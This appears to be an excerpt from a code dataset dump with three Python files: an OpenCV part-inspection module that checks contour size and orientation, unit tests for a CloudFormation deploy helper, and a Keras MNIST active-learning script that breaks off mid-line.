= cv2.split(frame)\n\t\t\t\n\tdef computeRedMinusGB(self, 
frame):\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\tblue, green, red = cv2.split(frame)\n\t\t\tout_frame=cv2.subtract(red,blue)\n\t\t\tout_frame=cv2.subtract(out_frame,green)\n\t\t\treturn out_frame\n\t\t\n\tdef computeThreshold(self, frame, threshold):\n\t\t#blur = cv2.GaussianBlur(frame,(5,5),0)\n\t\t#ret3,th3 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\t#self.grayImage = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\t\t\tret, thresh = cv2.threshold(frame,threshold,255,0)\n\t\t\treturn thresh\n\t\t\t\n\tdef showRed(self, show):\n\t\tif show==True: cv2.imshow('Red',self.redImage)\n\t\treturn self.redImage\n\t\t\n\tdef showGreen(self, show):\n\t\tif show==True: cv2.imshow('Green',self.greenImage)\n\t\treturn self.greenImage\n\t\t\n\tdef showBlue(self, show):\n\t\tif show==True: cv2.imshow('Blue',self.blueImage)\n\t\treturn self.blueImage\n\t\n\tdef compute_image(self,frame):\n\t\tself.dimX , self.dimY = frame.shape[:2]\n\t\tif self.dimX>0:\n\t\t\tself.grayImage = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\t\t\tret, thresh = cv2.threshold(self.grayImage,self.image_threshold,255,0)\n\t\t\tself.image=thresh\n\t\t#cv2.imshow('Test',self.image)\n\t\n\tdef showPreview(self, show_raw, show_computed):\n\t\tif show_raw==True and show_computed==False and self.dimX>0:\n\t\t\tcv2.imshow('Threshold',self.image)\n\t\t\tcv2.imshow('Grayscale',self.grayImage)\n\t\telif show_computed==True and len(self.box)>0:\n\t\t\timg_box=cv2.cvtColor(self.image, cv2.COLOR_GRAY2BGR)\n\t\t\tbox = cv2.cv.BoxPoints(self.box) \n\t\t\tbox = np.array(box, dtype=\"int\")\n\t\t\tcv2.drawContours(img_box, [box], -1, (255, 0, 0), 2)\n\t\t\tcv2.drawContours(img_box, self.contour_to_show, -1, (0, 255, 0), 2)\n\t\t\tbox_dimensions=self.box[1]\n\t\t\tcv2.putText(img_box,\" Box Dimensions: \"+str(box_dimensions)+\" Time: \"+str(time.time()),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\t\tcv2.imshow('Computed',img_box)\n\t\telif show_raw==False:\n\t\t\tcv2.destroyWindow('Threshold')\n\t\t\tcv2.destroyWindow('Grayscale')\n\t\telif show_computed==False:\n\t\t\tcv2.destroyWindow('Computed')\n\n\t\t\t\n\tdef showPixelValue(self, frame, x, y, name):\n\t\tdimX , dimY = frame.shape[:2]\n\t\tif dimX>0:\n\t\t\tcolorValue=frame[y][x]\n\t\t\tdrawFrame=cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)\n\t\t\tbox = [[x,y],[x+1,y+1]] \n\t\t\tbox = np.array(box, dtype=\"int\")\n\t\t\tcv2.drawContours(drawFrame, [box], -1, (255, 0, 255), 2)\n\t\t\tcv2.putText(drawFrame,\" Value: \"+str(colorValue),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 0, 255), 2)\n\t\t\tcv2.imshow(name,drawFrame)\n\t\t\n\t\t\t\n\tdef save_raw_image(self,saveSetting,objectNo, imageNo):\n\t\tnow=format(time.time(),'.2f')\n\t\tif self.OrientationStatus==\"BAD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\") : \n\t\t\tfilename=self.controlImagePath+\"bad_orient/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_bad_orient_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\n\t\telif self.OrientationStatus==\"GOOD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"All Good\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"good/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_good_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\n\t\telif self.OrientationStatus==\"FLIP\" and 
(saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"All Good\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"flip/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_flip_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\n\t\telif self.SizeStatus==\"BAD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\"): \n\t\t\tfilename=self.controlImagePath+\"bad_size/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_bad_size_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\t\n\t\telif saveSetting==\"All Raw\": \n\t\t\tfilename=self.controlImagePath+\"out/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_out_raw.png\"\n\t\t\tcv2.imwrite(filename, self.grayImage)\n\t\t\n\tdef save_analysed_image(self,saveSetting,objectNo, imageNo):\n\t\tnow=format(time.time(),'.2f')\n\t\tif self.SizeStatus==\"BAD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"bad_size/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_bad_size.png\"\n\t\t\timg_box=cv2.cvtColor(self.image, cv2.COLOR_GRAY2BGR)\n\t\t\tbox = cv2.cv.BoxPoints(self.box) \n\t\t\tbox = np.array(box, dtype=\"int\")\n\t\t\tcv2.drawContours(img_box, [box], -1, (255, 0, 0), 2)\n\t\t\tcv2.drawContours(img_box, self.contour_to_show, -1, (0, 255, 0), 2)\n\t\t\tbox_dimensions=(round(self.box[1][0],2),round(self.box[1][1],2))\n\t\t\tcv2.putText(img_box,\" Box Dimensions: \"+str(box_dimensions)+\" Max: \"+str(self.BoxMax)+\" Min: \"+str(self.BoxMin)+\" Time: \"+str(time.time()),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\t\tcv2.imwrite(filename, img_box)\n\t\telif self.OrientationStatus==\"BAD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\"): \n\t\t\tfilename=self.controlImagePath+\"bad_orient/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_bad_orient.png\"\n\t\t\tcv2.imwrite(filename, self.analyzedImage)\n\t\telif self.OrientationStatus==\"FLIP\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"All Good\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"flip/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_flip.png\"\n\t\t\tcv2.imwrite(filename, self.analyzedImage)\n\t\telif self.OrientationStatus==\"GOOD\" and (saveSetting==\"All Raw\" or saveSetting==\"All Parts\" or saveSetting==\"All Good\" or saveSetting==\"Contours\"): \n\t\t\tfilename=self.controlImagePath+\"good/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_good.png\"\n\t\t\tcv2.imwrite(filename, self.analyzedImage)\n\t\t\n\t\t#filename=self.controlImagePath+\"bad_size/\"+str(imageNo).zfill(self.leadZeros)+\"_time_\"+str(now)+\"_obj_\"+str(objectNo).zfill(self.leadZeros)+\"_scanned.png\"\n\t\t#cv2.imwrite(filename, self.analyzedImage)\n\t\t#elif self.SizeStatus==\"GOOD\" :\n\t\t#self.savePicsOptions=( \"All Raw\", \"All Good\", \"All Parts\",\"Contours\",\"None\")\n\t\n\tdef load_image(self):\n\t\tself.image=cv2.imread(\"sample_images/sample.png\", 0)\n\t\tself.dimX , self.dimY = self.image.shape[:2]\n\t\n\tdef set_resize_factor(self, 
factor):\n\t\tself.show_scale_factor=factor\n\t\t\n\tdef image_resize(self, image):\n\t\treturn cv2.resize(image,(int(self.dimY*self.show_scale_factor),int(self.dimX*self.show_scale_factor)),interpolation = cv2.INTER_AREA)\n\t\n\tdef check_status(self):\n\t\treturn self.OrientationStatus\n\t\n\t#def show_box(self, plot_title):\n\t#\tcv2.imshow(plot_title,self.image_resize(self.check_modular_boxes()))\n\t\n\tdef set_recognition_parameters(self, BoxMax, BoxMin, EmptyBoxes):\n\t\tself.BoxMax=BoxMax\n\t\tself.BoxMin=BoxMin\n\t\tself.EmptyBoxes=EmptyBoxes\n\t\t\n\t\n\tdef check_box_dim(self):\n\t\tif self.get_selected_contour() == None:\n\t\t\tself.SizeStatus=\"BAD\"\n\t\t\treturn self.SizeStatus\n\t\tself.box = cv2.minAreaRect(self.contour_to_show)\n\t\tbox_length=max(self.box[1])\n\t\tbox_width=min(self.box[1])\n\t\tself.SizeStatus=\"BAD\"\n\t\tchecksum=0\n\t\t#check the max values\n\t\tif self.BoxMax[0]>0:\n\t\t\tif box_length<self.BoxMax[0]:\n\t\t\t\tchecksum+=1\n\t\telse :\n\t\t\tchecksum+=1\n\n\t\tif self.BoxMax[1]>0:\n\t\t\tif box_width<self.BoxMax[1]:\n\t\t\t\tchecksum+=1\n\t\telse :\n\t\t\tchecksum+=1\n\n\t\t#check the min values\n\t\tif self.BoxMin[0]>0:\n\t\t\tif box_length>self.BoxMin[0]:\n\t\t\t\tchecksum+=1\n\t\telse :\n\t\t\tchecksum+=1\n\t\t\t\n\t\tif self.BoxMin[1]>0:\n\t\t\tif box_width>self.BoxMin[1]:\n\t\t\t\tchecksum+=1\n\t\telse :\n\t\t\tchecksum+=1\n\t\t\n\t\tif checksum>=4 :\n\t\t\t#print(\"good box! Width: \"+str(box_width)+\" length: \"+str(box_length))\n\t\t\tself.SizeStatus=\"GOOD\"\n\t\t\treturn True\n\t\telse :\n\t\t\t#print(\"bad box! Width: \"+str(box_width)+\" length: \"+str(box_length))\n\t\t\tself.SizeStatus=\"BAD\"\n\t\t\treturn False\n\n\tdef showContour(self, frame, contour):\n\t\tif contour is not None:\n\t\t\tboxrect = cv2.minAreaRect(contour)\n\t\t\tbox = cv2.cv.BoxPoints(boxrect) \n\t\t\tbox = np.array(box, dtype=\"int\")\n\t\t\t#print(\"box: \",boxrect)\n\t\t\tbox_dimensions=(round(boxrect[1][0],2),round(boxrect[1][1],2),round(boxrect[2],2))\n\t\t\tcv2.putText(frame,\" Box Dim: \"+str(box_dimensions),(10,10),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\t\tcv2.drawContours(frame, [box], -1, ( 0,255, 0), 2)\n\t\t\tcv2.drawContours(frame, contour, -1, (255, 0, 0), 2)\n\t\t\tcv2.imshow('Contour',frame)\n\t\t\treturn frame\n\n\tdef check_modular_boxes(self):\n\t\tif len(self.contour_to_show) <= 0:\n\t\t\tself.OrientationStatus=\"BAD\"\n\t\t\treturn self.OrientationStatus\n\t\tBlockRectanglesGood=[]\n\t\tBlockRectanglesFlip=[]\n\t\tTestResultsGood=[]\n\t\tTestResultsFlip=[]\n\t\timg_box=cv2.cvtColor(self.image, cv2.COLOR_GRAY2BGR)\n\t\tself.OrientationStatus=\"BAD\"\n\t\t#self.box = cv2.minAreaRect(self.contour_to_show)\n\t\tbox_angle=self.box[2]\n\t\tbox_dimensions=self.box[1]\n\t\tbox = cv2.cv.BoxPoints(self.box) \n\t\tbox = np.array(box, dtype=\"int\")\n\t\tcv2.drawContours(img_box, [box], -1, (255, 0, 0), 2)\n\t\tcv2.drawContours(img_box, self.contour_to_show, -1, (0, 255, 0), 2)\n\t\tif box_dimensions[0]<box_dimensions[1] and box_angle>0:\n\t\t\tboxSorted=[box[box[:,1].argmin()],box[box[:,0].argmax()],box[box[:,1].argmax()],box[box[:,0].argmin()]]\n\t\t\tboxTopLeftX=boxSorted[0][0]\n\t\t\tboxTopLeftY=boxSorted[0][1]\n\t\t\tboxTopRightX=boxSorted[1][0]\n\t\t\tboxTopRightY=boxSorted[1][1]\n\t\t\tboxBottomRightX=boxSorted[2][0]\n\t\t\tboxBottomRightY=boxSorted[2][1]\n\t\t\tboxBottomLeftX=boxSorted[3][0]\n\t\t\tboxBottomLeftY=boxSorted[3][1]\n\t\telse :\n\t\t\tmaxX=box[box[:,0].argmax()][0]\n\t\t\tmaxY=box[box[:,1].argmax()][1]\n\t\t\t\n\t\t\t#boxSorted=[box[box[:,1].argmin()],box[box[:,0].argmax()],box[box[:,1].argmax()],box[box[:,0].argmin()]]\n\t\t\tfor i in range(0,4):\n\t\t\t\tif box[i][0]==maxX :\n\t\t\t\t\tif box[i][1]==maxY 
:\n\t\t\t\t\t\tboxBottomRightX=box[i][0]\n\t\t\t\t\t\tboxBottomRightY=box[i][1]\n\t\t\t\t\t\t#print(\"bottomRx: \"+str(boxBottomRightX)+\" bottomRy: \"+str(boxBottomRightY))\n\t\t\t\t\telse :\n\t\t\t\t\t\tboxTopRightX=box[i][0]\n\t\t\t\t\t\tboxTopRightY=box[i][1]\n\t\t\t\t\t\t#print(\"TopRightx: \"+str(boxTopRightX)+\" TopRighty: \"+str(boxTopRightY))\n\t\t\t\telse :\n\t\t\t\t\tif box[i][1]==maxY :\n\t\t\t\t\t\tboxBottomLeftX=box[i][0]\n\t\t\t\t\t\tboxBottomLeftY=box[i][1]\n\t\t\t\t\t\t#print(\"bottomLx: \"+str(boxBottomLeftX)+\" bottomLy: \"+str(boxBottomLeftY))\n\t\t\t\t\telse :\n\t\t\t\t\t\tboxTopLeftX=box[i][0]\n\t\t\t\t\t\tboxTopLeftY=box[i][1]\n\t\t\t\t\t\t#print(\"TopLeftx: \"+str(boxTopLeftX)+\" TopLefty: \"+str(boxTopLeftY))\n\t\tboxHeightX=boxBottomLeftX-boxTopLeftX\n\t\tboxHeightY=boxBottomLeftY-boxTopLeftY\n\t\tboxWidthX=boxBottomRightX-boxBottomLeftX\n\t\tboxWidthY=boxBottomRightY-boxBottomLeftY\n\t\t#print(\"box: \",box)\n\t\t#print(\"boxWidthX :\"+str(boxWidthX)+\" boxWidthY :\"+str(boxWidthY)+\" boxHeightX :\"+str(boxHeightX)+\" boxHeightY :\"+str(boxHeightY)+\" boxTopLeftX :\"+str(boxTopLeftX)+\" boxTopLeftY :\"+str(boxTopLeftY))\n\t\tfor i in range(0,10):\n\t\t\t#print(\"EmptyBoxes: \",self.EmptyBoxes[i])\n\t\t\tif sum(self.EmptyBoxes[i])>0:\n\t\t\t\t#print(\"we draw rectangle i: \",i)\n\t\t\t\t#print(\"EmptyBoxes in if: \",self.EmptyBoxes[i])\n\t\t\t\t#print(\"BlockRect: \",BlockRectanglesGood)\n\t\t\t\tTopLeftX=boxTopLeftX+int(self.EmptyBoxes[i][0]*boxWidthX)+int(self.EmptyBoxes[i][1]*boxHeightX)\n\t\t\t\tTopLeftY=boxTopLeftY+int(self.EmptyBoxes[i][0]*boxWidthY)+int(self.EmptyBoxes[i][1]*boxHeightY)\n\t\t\t\t#print(\"WidthY :\"+str(self.EmptyBoxes[i][1]*boxWidthY)+\" HeightY: \"+str(self.EmptyBoxes[i][1]*boxHeightY))\n\t\t\t\tTopRightX=TopLeftX+int(self.EmptyBoxes[i][2]*boxWidthX)\n\t\t\t\tTopRightY=TopLeftY+int(self.EmptyBoxes[i][2]*boxWidthY)\n\t\t\t\tBottomRightX=TopRightX+int(self.EmptyBoxes[i][3]*boxHeightX)\n\t\t\t\tBottomRightY=TopRightY+int(self.EmptyBoxes[i][3]*boxHeightY)\n\t\t\t\tBottomLeftX=BottomRightX-int(self.EmptyBoxes[i][2]*boxWidthX)\n\t\t\t\tBottomLeftY=BottomRightY-int(self.EmptyBoxes[i][2]*boxWidthY)\n\t\t\t\t\n\t\t\t\tTopLeft=[TopLeftX,TopLeftY]\n\t\t\t\tTopRight=[TopRightX,TopRightY]\n\t\t\t\tBottomLeft=[BottomLeftX,BottomLeftY]\n\t\t\t\tBottomRight=[BottomRightX,BottomRightY]\n\t\t\t\tto_append=[TopLeft,TopRight,BottomRight,BottomLeft]\n\t\t\t\tto_append=np.array(to_append, dtype=\"int\")\n\t\t\t\tBlockRectanglesGood.append(to_append)\n\t\t\t\t\n\t\t\t\tBottomRightX=boxBottomRightX-int(self.EmptyBoxes[i][0]*boxWidthX)-int(self.EmptyBoxes[i][1]*boxHeightX)\n\t\t\t\tBottomRightY=boxBottomRightY-int(self.EmptyBoxes[i][0]*boxWidthY)-int(self.EmptyBoxes[i][1]*boxHeightY)\n\t\t\t\tBottomLeftX=BottomRightX-int(self.EmptyBoxes[i][2]*boxWidthX)\n\t\t\t\tBottomLeftY=BottomRightY-int(self.EmptyBoxes[i][2]*boxWidthY)\n\t\t\t\tTopLeftX=BottomLeftX-int(self.EmptyBoxes[i][3]*boxHeightX)\n\t\t\t\tTopLeftY=BottomLeftY-int(self.EmptyBoxes[i][3]*boxHeightY)\n\t\t\t\tTopRightX=TopLeftX+int(self.EmptyBoxes[i][2]*boxWidthX)\n\t\t\t\tTopRightY=TopLeftY+int(self.EmptyBoxes[i][2]*boxWidthY)\n\t\t\t\t\n\t\t\t\tTopLeft=[TopLeftX,TopLeftY]\n\t\t\t\tTopRight=[TopRightX,TopRightY]\n\t\t\t\tBottomLeft=[BottomLeftX,BottomLeftY]\n\t\t\t\tBottomRight=[BottomRightX,BottomRightY]\n\t\t\t\tto_append=[TopLeft,TopRight,BottomRight,BottomLeft]\n\t\t\t\tto_append=np.array(to_append, dtype=\"int\")\n\t\t\t\tBlockRectanglesFlip.append(to_append)\n\t\t#BlockRectanglesGood = 
np.array(BlockRectanglesGood, dtype=\"int\")\n\t\t#print(\"we draw rectangle points: \",len(BlockRectanglesFlip))\n\t\tstatusText=\"\"\n\t\tfor i in range(0, len(self.contour_to_show)):\n\t\t\tcontourPoint=(self.contour_to_show[i][0][0],self.contour_to_show[i][0][1])\n\t\t\tfor k in range(0, len(BlockRectanglesFlip)) :\n\t\t\t\tcv2.drawContours(img_box, [BlockRectanglesGood[k]], -1, (255, 255, 0), 2) #light blue\n\t\t\t\tcv2.drawContours(img_box, [BlockRectanglesFlip[k]], -1, (0, 255, 255), 2) #yellow\n\t\t\t\t#test each contour point against the good and flipped block rectangles\n\t\t\t\t#(reconstructed span: assumed pointPolygonTest accumulation, keeping the max signed distance per rectangle)\n\t\t\t\tif len(TestResultsGood)<=k :\n\t\t\t\t\tTestResultsGood.append(cv2.pointPolygonTest(BlockRectanglesGood[k].astype('float32'), contourPoint, True))\n\t\t\t\t\tTestResultsFlip.append(cv2.pointPolygonTest(BlockRectanglesFlip[k].astype('float32'), contourPoint, True))\n\t\t\t\telse :\n\t\t\t\t\tTestResultsGood[k]=max(TestResultsGood[k], cv2.pointPolygonTest(BlockRectanglesGood[k].astype('float32'), contourPoint, True))\n\t\t\t\t\tTestResultsFlip[k]=max(TestResultsFlip[k], cv2.pointPolygonTest(BlockRectanglesFlip[k].astype('float32'), contourPoint, True))\n\t\tif max(TestResultsGood)<0 and max(TestResultsFlip)>0:\n\t\t\tself.OrientationStatus=\"GOOD\"\n\t\telif max(TestResultsGood)>0 and max(TestResultsFlip)<0:\n\t\t\tself.OrientationStatus=\"FLIP\"\n\t\telse:\n\t\t\tself.OrientationStatus=\"BAD\"\t\n\t\tcv2.putText(img_box,\" Box Dimensions: \"+str(box_dimensions)+\" Time: \"+str(time.time()),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\t#cv2.putText(img_box,\" Box Dimensions: \"+str(box_dimensions)+\" Time: \"+str(time.time())+\" Delta Time: \"+str(QualityMeasures['deltaTime'])+\" Delta Good: \"+str(QualityMeasures['deltaGood']),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.45, (255, 255, 255), 2)\n\t\tcv2.putText(img_box,\"ORIENTATION: \"+self.OrientationStatus+\" SIZE: \"+self.SizeStatus,(10,self.dimX-30),cv2.FONT_HERSHEY_SIMPLEX,1, (255, 255, 255), 2)\n\t\t#print(\"TestResultsFlip: \",TestResultsFlip)\n\t\t#if len(TestResultsGood)\n\t\tself.analyzedImage=img_box\n\t\treturn self.OrientationStatus","sub_path":"contour_operations.py","file_name":"contour_operations.py","file_ext":"py","file_size_in_byte":17517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"483838752","text":"import unittest\n\nfrom unittest.mock import Mock, patch\n\nfrom minipipe import deploy_cloudformation\n\n\nclass TestHandler(unittest.TestCase):\n    \"\"\"Test handler methods\"\"\"\n\n\n    @patch('minipipe.cf_check_status')\n    @patch('minipipe.cf_create')\n    @patch('minipipe.cf_update')\n    def test_cf_create(self, mock_cf_update, mock_cf_create, mock_cf_check_status):\n        mock_cf_check_status.return_value = None\n        deploy_cloudformation('minipipe-test', 'test')\n        mock_cf_create.assert_called_once()\n\n\n    @patch('minipipe.cf_check_status')\n    @patch('minipipe.cf_create')\n    @patch('minipipe.cf_update')\n    def test_cf_update(self, mock_cf_update, mock_cf_create, mock_cf_check_status):\n        mock_cf_check_status.return_value = {'Stacks': [{'StackId': 'minipipe-test'}]}\n        deploy_cloudformation('minipipe-test', 'test')\n        mock_cf_update.assert_called_once()\n","sub_path":"tests/test_deploy_cloudformation.py","file_name":"test_deploy_cloudformation.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"94007022","text":"from __future__ import print_function\nfrom keras.datasets import mnist\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.optimizers import SGD, Adadelta, Adagrad, Adam\nfrom keras.utils import np_utils, generic_utils\nfrom six.moves import range\nimport numpy as np\nimport scipy as sp\nfrom keras import backend as K \nimport random\nimport scipy.io\nimport matplotlib.pyplot as plt\nfrom keras.regularizers import l2, activity_l2\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy import linalg\n\nbatch_size = 128\nnb_classes = 10\nnb_epoch = 
1\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n# number of convolutional filters to use\nnb_filters = 32\n# size of pooling area for max pooling\nnb_pool = 2\n# convolution kernel size\nnb_conv = 3\n\n# the data, shuffled and split between tran and test sets\n(X_train_All, y_train_All), (X_test, y_test) = mnist.load_data()\n\nX_train_All = X_train_All.reshape(X_train_All.shape[0], 1, img_rows, img_cols)\nX_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n\n#Find Binary Images - MBR over Binary Images only - considering only images 2 and 8\nClass_2_Train = np.where(y_train_All==2)[0]\nClass_8_Train = np.where(y_train_All==8)[0]\ny_2 = y_train_All[Class_2_Train]\nX_2 = X_train_All[Class_2_Train, :, :, :]\ny_8 = y_train_All[Class_8_Train]\nX_8 = X_train_All[Class_8_Train, :, :, :]\n\nX_train_All = np.concatenate((X_2, X_8), axis=0)\ny_train_All = np.concatenate((y_2, y_8), axis=0)\nX_train_All = X_train_All[0:10000, :, :, :]\ny_train_All = y_train_All[0:10000]\n\n\nClass_2_Test = np.where(y_test==2)[0]\nClass_8_Test = np.where(y_test==8)[0]\ny_2_test = y_test[Class_2_Test]\nX_2_test = X_test[Class_2_Test, :, :, :]\ny_8_test = y_test[Class_8_Test]\nX_8_test = X_test[Class_8_Test, :, :, :]\n\nX_test = np.concatenate((X_2_test, X_8_test), axis=0)\ny_test = np.concatenate((y_2_test, y_8_test), axis=0)\nX_test = X_test[0:2000, :, :, :]\ny_test = y_test[0:2000]\n\n\n#after 50 iterations with 10 pools - we have 500 pooled points - use validation set outside of this\nX_valid = X_train_All[2000:2150, :, :, :]\ny_valid = y_train_All[2000:2150]\n\n\n# X_train = X_train_All[0:200, :, :, :]\n# y_train = y_train_All[0:200]\n\nX_train = X_train_All[0:200, :, :, :]\ny_train = y_train_All[0:200]\n\n# X_Pool = X_train_All[5000:15000, :, :, :]\n# y_Pool = y_train_All[5000:15000]\n\nX_Pool = X_train_All[5000:7000, :, :, :]\ny_Pool = y_train_All[5000:7000]\n\n\n# X_test = X_test[0:20, :, :, :]\n# y_test = y_test[0:20]\n\n\nall_accuracy = 0\n\n#we can train the model and evaluate the test accuracy with original size of training data here\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_valid = X_valid.astype('float32')\nX_Pool = X_Pool.astype('float32')\nX_train /= 255\nX_valid /= 255\nX_Pool /= 255\nX_test /= 255\n\nY_test = np_utils.to_categorical(y_test, nb_classes)\nY_valid = np_utils.to_categorical(y_valid, nb_classes)\nY_Pool = np_utils.to_categorical(y_Pool, nb_classes)\n\nPool_Valid_Loss = np.zeros(shape=(nb_epoch, 1)) \t#row - no.of epochs, col (gets appended) - no of pooling\nPool_Train_Loss = np.zeros(shape=(nb_epoch, 1)) \nx_pool_All = np.zeros(shape=(1))\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\n\nprint('Training Model Without Acquisitions')\n\nmodel = Sequential()\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))\nmodel.add(Activation('relu'))\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\n\nhist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_valid, Y_valid))\nTrain_Result_Optimizer = hist.history\nTrain_Loss = 
np.asarray(Train_Result_Optimizer.get('loss'))\nTrain_Loss = np.array([Train_Loss]).T\nValid_Loss = np.asarray(Train_Result_Optimizer.get('val_loss'))\nValid_Loss = np.asarray([Valid_Loss]).T\n\nPool_Train_Loss = Train_Loss\nPool_Valid_Loss = Valid_Loss\n\nprint('Evaluating Test Accuracy Without Acquisition')\nscore, acc = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\n\nall_accuracy = acc\n\n\n\n\nacquisition_iterations = 2\n\n#number of points to query every iteration\nQuery = 50\n\nprint('Performing Active Learning')\nfor i in range(acquisition_iterations):\n\n\tprint('POOLING ITERATION ', i)\n\n\tAll_Data = np.concatenate( (X_train, X_Pool), axis=0 )\n\n\t#TODO: need to downsample the image data:\t - CHECK THIS\n\tImage_Data = All_Data.reshape(All_Data.shape[0], img_rows*img_cols)\n\n\t#compute the kernel matrix (Gaussian affinities, hence the negative exponent)\n\tsigma = 1\n\tpairwise_dists = squareform(pdist(Image_Data, 'euclidean'))\n\tW = sp.exp(-pairwise_dists ** 2 / sigma ** 2)\n\n\n\t#compute the combinatorial Laplacian\n\td_i = W.sum(axis=1)\n\tD = np.diag(d_i)\n\n\tDelta = D - W \n\n\t#computing the harmonic function - without any acquisitions yet\n\tDelta_ll = Delta[0:X_train.shape[0], 0:X_train.shape[0]]\n\tDelta_ul = Delta[X_train.shape[0]:, 0:X_train.shape[0]]\n\tDelta_lu = Delta[0:X_train.shape[0], X_train.shape[0]:]\n\tDelta_uu = Delta[X_train.shape[0]:, X_train.shape[0]:]\n\n\n\tinv_Delta_uu = linalg.inv(Delta_uu)\n\tOriginal_f_L = y_train\n\tDelta_mult = np.dot(inv_Delta_uu, Delta_ul)\n\tOriginal_f_U = - np.dot(Delta_mult, Original_f_L)\t\t\t\n\n\t#f_I is the entire harmonic function over all the data points (U + L)\n\tOriginal_f_I = np.concatenate((Original_f_L, Original_f_U), axis=0)\n\n\t#compute the estimated Bayes risk - no acquisitions yet\n\t# R = np.array([0])\n\t# for m in range(Original_f_I.shape[0]):\n\t# \tval_f_I = Original_f_I[m]\n\t# \tother_val_f_I = 1 - val_f_I\n\t# \tmin_val = np.amin(np.array([val_f_I, other_val_f_I]))\n\t# \tR = R + min_val\n\n\n\tprint('Compute Expected Bayes Risk for ALL Pool Points in Acquisition Iteration ', i)\n\n\t# need to store the expected estimated risk value for each unlabelled pool point\n\tBayes_Risk = np.zeros(shape=(X_Pool.shape[0]))\n\tPool_Subset = 100\n\n\tfor k in range(Pool_Subset):\n\n\t\tprint('Pool Subset Iteration', k)\n\n\t\t#compute estimated risk for each added point\n\t\tPool_Point = X_Pool[np.array([k]), :, :, :]\n\t\tPool_Point_y = y_Pool[np.array([k])]\n\n\t\t#add this pool point to labelled data - but we don't know the actual label for it\n\t\tX_train_Temp = np.concatenate((X_train, Pool_Point), axis=0)\n\t\ty_train_Temp = np.concatenate((y_train, Pool_Point_y), axis=0)\n\n\t\t#delete this pool point from pool set\n\t\tX_Pool_Temp = np.delete(X_Pool, k, 0)\n\n\n\t\t# # W and D stays the same - only Delta_uu, Delta_ul etc changes\n\t\tDelta_ll = Delta[0:X_train_Temp.shape[0], 0:X_train_Temp.shape[0]]\n\t\tDelta_ul = 